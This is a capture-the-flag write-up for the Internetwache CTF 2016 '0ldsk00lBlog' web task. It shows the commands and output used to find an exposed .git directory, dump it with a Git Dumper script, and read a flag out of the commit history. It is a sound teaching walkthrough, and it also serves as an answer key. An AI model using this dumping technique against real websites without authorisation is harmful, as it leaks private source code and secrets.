Title : [writeups] Internetwache CTF 2016 - 0ldsk00lBlog #web80
Released : 2016-02-22 02:57:02 -0500
Viewed : 886

https://ctf.internetwache.org/tasks/web/80

Description: I stumbled across this kinda oldskool blog. I bet it is unhackable, I mean, there's only static HTML.

Service: https://0ldsk00lblog.ctf.internetwache.org/

I see 'Git' in these words "All people are talking about a tool called 'Git'" as hint. So, i just guest it's git's directory

https://0ldsk00lblog.ctf.internetwache.org/.git/

$ curl -I https://0ldsk00lblog.ctf.internetwache.org/.git/
HTTP/1.1 403 Forbidden
Server: nginx/1.9.11
Date: Sun, 21 Feb 2016 17:41:47 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive

Forbidden. but it's exist :)

I use Git Dumper to dump these static files.

$ ./gitdumper.sh https://0ldsk00lblog.ctf.internetwache.org/.git/ dest-dir
Downloaded: HEAD
Downloaded: objects/info/packs
Downloaded: description
Downloaded: config
Downloaded: COMMIT_EDITMSG
Downloaded: index
Downloaded: packed-refs
Downloaded: refs/heads/master
Downloaded: refs/remotes/origin/HEAD
Downloaded: refs/stash
Downloaded: logs/HEAD
Downloaded: logs/refs/heads/master
Downloaded: logs/refs/remotes/origin/HEAD
Downloaded: info/refs
Downloaded: info/exclude
Downloaded: objects/8c/46583a968da7955c13559693b3b8c5e5d5f510
Downloaded: objects/00/00000000000000000000000000000000000000
Downloaded: objects/14/d58c53d0e70c92a3a0a5d22c6a1c06c4a2d296
Downloaded: objects/db/a52097aba3af2b30ccbc589912ae67dcf5d77b
Downloaded: objects/26/858023dc18a164af9b9f847cbfb23919489ab2
Downloaded: objects/33/a5c0876603d7a6f9729637f36030bbabb2afa3
Downloaded: objects/19/49446afea12e0937044fdabe8cc101c87f7c54
Downloaded: objects/95/a5396e62ca5c9577f761ebe969f52d3b6a9235
Downloaded: objects/3b/e70be50c04bab8cd5d115da10c3a9c784d6bae
Downloaded: objects/25/a3f35784188ac1c9bf48a94e5a9c815bcb598c
Downloaded: objects/75/03402e4d48be951cddda34aae6e01905bb5c98
Downloaded: objects/91/f09a7948e02d891d3a39c058a634a8752aba20
Downloaded: objects/55/08adb31bf48ae5fe437bdeba60f83982356934

tig it ;)

$ tig

2016-01-22 02:58 Sebastian Gehaxelt o [master] My recent blogpost
2016-01-22 02:57 Sebastian Gehaxelt o Added another post
2016-01-22 02:55 Sebastian Gehaxelt o Added next post
2016-01-22 02:55 Sebastian Gehaxelt I Initial commit

and there is 1 initial commit.

[main] 14d58c53d0e70c92a3a0a5d22c6a1c06c4a2d296 - commit 4 of 4 (100%)
commit 14d58c53d0e70c92a3a0a5d22c6a1c06c4a2d296
Author: Sebastian Gehaxelt <github@gehaxelt.in>
AuthorDate: Fri Jan 22 02:55:11 2016 +0100
Commit: Sebastian Gehaxelt <github@gehaxelt.in>
CommitDate: Fri Jan 22 02:55:11 2016 +0100

Initial commit
---
index.html | 12 ++++++++++++
1 file changed, 12 insertions(+)

diff --git a/index.html b/index.html
new file mode 100644
index 0000000..7503402
[diff] 14d58c53d0e70c92a3a0a5d22c6a1c06c4a2d296 - line 1 of 30 (46%)

1 file changed. let's take a look inside

        <p>
-               Oh, did I say that I like kittens? I like flags, too: IW{G1T_1S_4W3SOME}
+               It's 2016 now and I need to somehow keep track of my changes to this document as it grows and~
        </p>

 And, got the flag :)

Flag: IW{G1T_1S_4W3SOME}